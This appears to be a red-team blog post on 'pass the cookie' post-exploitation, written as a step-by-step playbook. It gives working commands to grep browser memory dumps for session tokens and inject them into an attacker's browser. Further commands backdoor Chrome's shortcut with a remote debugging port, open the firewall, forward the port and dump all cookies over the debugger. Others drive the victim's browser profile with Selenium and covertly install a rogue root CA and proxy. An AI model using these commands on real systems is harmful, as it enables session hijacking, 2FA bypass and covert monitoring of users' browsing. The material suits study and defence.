Pass the Cookie - Maor's Blog

## Theory Once we have admin rights on the target, we can focus on getting the user's cookies and injecting them into our own sessions, thus bypassing authentication + 2FA. We can do this multiple ways: 1. Dumping the memory of the browser and searching for cookie strings in the memory dumps. 2. Using the Chromium debug tools to get full access to the browser. 3. Installing Selenium and browser drivers on the target. 4. Using [[Mimikatz]] (DPAPI module) to decrypt the browser databases and read the cookies. 5. Proxying HTTP/S traffic. Also, generally speaking, once we have control over the target's browser, we can use it for additional purposes and not just to look for cookies: 1. As a proxy for our own internet browsing. 2. To exfiltrate target data by uploading it to sites. 3. To download data to the target. ## 1. Browser Process Memory Works for any browser. [[Dumping Process Memory]] Note that different sites will have different cookie names, so what you can do is similar to [[Project Kai]] - exfiltrate the browser DBs and investigate them locally, as most are usually decrypted. This will show you the sites the target browsed to. Head to those sites on your own machine, see how they store cookies, then search for those cookies in the browsers' memory dumps. ### GitHub example Authenticated users have the `user_session` cookie set, and searching through the dump files shows this: ```bash strings -n 20 ./* | grep -i "github.com" | grep -i "user_session" user_sessiongithub.com/ __Host-user_session_same_sitegithub.com/ __Host-user_session_same_siteNkDPgEv-I_1xW0mahg6WJwYcZKC8DS5522AATx27wjKgOWoggithub.com/b user_sessionNkDPgEv-I_1xW0jhst6WJwYcZKSIXTI23VAATx27wjKgOWoggithub.com/b ``` The last one is what we're looking for: ```text Cookie name: user_session Cookie value: NkDPgEv-I_1xW0jhst6WJwYcZKSIXTI23VAATx27wjKgOWog Cookie domain: github.com ``` On our attack browser run the following in the console: ```bash document.cookie = "user_session=NkDPgEv-I_1xW0jhst6WJwYcZKSIXTI23VAATx27wjKgOWog" ``` Refresh the page and we're logged in! ## 2. Browser Debugging ### Background Works on Chromium-based browsers - Brave, Chrome, Edge. There's an option to start the browser executable with a debugger attached, and when we connect to this debugger we essentially have full control over the browser and can "spy" on whatever the user is doing. Taking this idea a step further, we could change the shortcut of the browser to always start it with the debugger. On Windows 10 the shortcuts are located in `C:\ProgramData\Microsoft\Windows\Start Menu\Programs`. Taking Chrome as an example, head to Properties and change the "Target" field (requires Admin): ```text Original "C:\Program Files\Google\Chrome\Application\chrome.exe" Modified "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 ``` This can be done with PowerShell like so: ```powershell $shell = New-Object -COM WScript.Shell $shortcut = $shell.CreateShortcut("C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk") $shortcut.Arguments = "--remote-debugging-port=9222" $shortcut.Save() ``` ### Details The Headless browser doesn't work with specifying user directory, so we'll have to kill the process and restart it: ```bash Get-Process chrome | Stop-Process Start-Process "chrome.exe" -ArgumentList '--remote-debugging-port=9222' Start-Process "chrome.exe" -ArgumentList '--remote-debugging-port=9222 --restore-last-session' Start-Process "Brave" -ArgumentList '--remote-debugging-port=9222 --user-data-dir="C:\Users\Maor\AppData\Local\BraveSoftware\Brave-Browser\User Data" --profile-directory="Profile 1" --restore-last-session' ``` ```text chrome --remote-debugging-port=9222 chrome --remote-debugging-port=9222 https://app.hackthebox.com chrome --remote-debugging-port=9222 --user-data-dir="C:\Users\Maor\Downloads\chrome\User Data" ``` Create a port-forward to connect from the Kali: ```bash netsh interface portproxy add v4tov4 listenport=9222 listenaddress=192.168.186.1 connectport=9222 connectaddress=127.0.0.1 New-NetFirewallRule -Name BrowserDebugger -DisplayName "Open Port 9222" -Direction Inbound -Protocol tcp -LocalPort 9222 -Action Allow -Enabled True # Remove netsh interface portproxy reset Remove-NetFirewallRule -Name BrowserDebugger ``` Browsing to the initial debug JSON page will give us the exact debug URL for each tab: ```bash curl http://192.168.186.1:9222/json [ { "description": "", "devtoolsFrontendUrl": "/devtools/inspector.html?ws=192.168.186.1:9222/devtools/page/F039EBC93637YEREDC9F7020256QSD9F", "faviconUrl": "https://app.hackthebox.com/images/HTB-favicon/favicon.ico", "id": "F039EBC93637YEREDC9F7020256QSD9F", "title": "Hack The Box :: Dashboard", "type": "page", "url": "https://app.hackthebox.com/home", "webSocketDebuggerUrl": "ws://192.168.186.1:9222/devtools/page/F039EBC93637YEREDC9F7020256QSD9F" }, { "description": "", "devtoolsFrontendUrl": "/devtools/inspector.html?ws=192.168.186.1:9222/devtools/page/CC80C51281472F04AEE9FB5C47C8BF04", "faviconUrl": "https://app.hackthebox.com/images/HTB-favicon/favicon.ico", "id": "CC80C51281472F04AEE9FB5C47C8BF04", "parentId": "F039EBC93637YEREDC9F7020256QSD9F", "title": "https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LfsC98ZAAAAALiRx9c6ab62VUSh8OTADXpF50hr&co=aHR0cHM6Ly9hcHAuaGFja3RoZWJveC5jb206NDQz&hl=en&v=M-QqaF9xk6BpjLH22uHZRhXt&size=invisible&cb=c3vnjgv7qoxv", "type": "iframe", "url": "https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LfsC98ZAAAAALiRx9c6ab62VUSh8OTADXpF50hr&co=aHR0cHM6Ly9hcHAuaGFja3RoZWJveC5jb206NDQz&hl=en&v=M-QqaF9xk6BpjLH22uHZRhXt&size=invisible&cb=c3vnjgv7qoxv", "webSocketDebuggerUrl": "ws://192.168.186.1:9222/devtools/page/CC80C51281472F04AEE9FB5C47C8BF04" } ] ``` We can then access the cookies in two ways. #### 1. Web Socket Debugger Connect to the `webSocketDebuggerUrl` using a web socket client: ```bash wsc ws://192.168.186.1:9222/devtools/page/F039EBC93637YEREDC9F7020256QSD9F Connected to ws://192.168.186.1:9222/devtools/page/F039EBC93637YEREDC9F7020256QSD9F > {"id": 1, "method": "Network.getAllCookies"} All the cookies are returned here... ``` Copy these to a file and use [[tool - jq]] to query it more effectively. ```bash cat cookies.json | jq '.result.cookies[].domain' | sort -u ".500px.com" "accounts.google.com" ".ads.linkedin.com" ".adsymptotic.com" ".atlassian.com" ... cat cookies.json | jq '.result.cookies[] | select(.domain=="www.hackthebox.com")' ... ``` #### 2. Dev-tools URL Browse to the `devtoolsFrontendUrl` using the same browser as the target (Chrome if Chrome, Edge if Edge). The tab will only be active when the user is on the screen, but even if the tab is inactive, we can still manually type in a URL which will force the browser to load the page and then load the user's stored cookies. We won't see the live feedback, but we will see the cookies load in the dev tools which we do have live access to: ![[Pasted image 20230930232730.png]] We can then copy and paste these cookies into our own session. #### 2.5 Chrome - Inspect Another way of accessing the above is through `chrome://inspect` (on the attack machine). You can add the target through "*Devices* > *Discover network targets*". ## 3. Selenium To get the browser version, check the uninstall string registry path: ```bash $regs = @("HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall", "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall", "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall", "HKCU\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall");foreach ($reg in $regs) {ls $reg -ErrorAction Ignore | findstr /i chrome} ``` Download the relevant Chrome driver + selenium webdriver: ```bash Add-Type -Path WebDriver.dll # taken from Net4.5 ``` At this point we can mimic the Chromium commands done above by passing them to `.AddArgument()`: ```powershell # Chrome $options = New-Object OpenQA.Selenium.Chrome.ChromeOptions $options.AddArgument("--user-data-dir=C:\Users\Maor\AppData\Local\Google\Chrome\User Data\") $options.AddArgument("--profile-directory=Profile 7") $driverChrome = New-Object OpenQA.Selenium.Chrome.ChromeDriver -ArgumentList @($options) # Edge $options = New-Object OpenQA.Selenium.Edge.EdgeOptions $options.AddArgument("--user-data-dir=C:\Users\Maor\AppData\Local\Microsoft\Edge\User Data") $options.AddArgument("--user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36 Edg/101.0.1210.53") $options.AddArgument("--remote-debugging-port=9222") $options.AddArgument("--headless") $edgeDriver = New-Object OpenQA.Selenium.Edge.EdgeDriver -ArgumentList @($options) ``` We can get the cookies through the debugger, or through Selenium: ```powershell $edgeDriver.Manage().Cookies.AllCookies ``` > In headless mode it wouldn't load the cookies for the saved HackTheBox session, even though it would load the authenticated session itself. Happened only once though, then I couldn't get it to work in headless. Getting a screenshot: ```powershell $b64Screenshot = $edgeDriver.GetScreenshot() $bytes = [Convert]::FromBase64String($b64Screenshot) [IO.File]::WriteAllBytes("C:\Users\Maor\Downloads\temp\bla.png", $bytes) ``` ## 4. Proxying HTTP/S Traffic [[2022-07-07_Thu]] - Follow the instructions here - [[Proxying Network Traffic#Windows#Covertly Setting Proxy]] - to enable the system-wide HTTP/S proxy settings and to install Burp's CA as a root CA on the target. Then, let's say the target has an authenticated GitHub session in Firefox, as the attacker you can start Firefox and instruct it to head to that site, which will automatically send the requests with the saved cookies, which you'll then see because you're proxying and decrypting all the HTTPS traffic: ```bash Start-Process firefox -ArgumentList '"github.com"' ``` In Burp: ![[Pasted image 20220707204437.png]] To disable the proxy [[Proxying Network Traffic#Covertly Setting Proxy|see here]], and to remove the installed CA [[How Does TLS Work#Covertly Installing Root Certificate|see here]]. *** ## Footnotes Resources - [Pass the Cookie and Pivot to the Clouds](https://embracethered.com/blog/posts/passthecookie/) - [Stealing Chrome cookies without a password](https://mango.pdf.zone/stealing-chrome-cookies-without-a-password) - [Hands in the Cookie Jar: Dumping Cookies with Chromium’s Remote Debugger Port](https://posts.specterops.io/hands-in-the-cookie-jar-dumping-cookies-with-chromiums-remote-debugger-port-34c4f468844e) - [Cookie Crimes and the new Microsoft Edge Browser](https://embracethered.com/blog/posts/2020/cookie-crimes-on-mirosoft-edge/) - [Post-Exploitation: Abusing Chrome's debugging feature to observe and control browsing sessions remotely](https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/) - [List of Chromium Command Line Switches](https://peter.sh/experiments/chromium-command-line-switches/)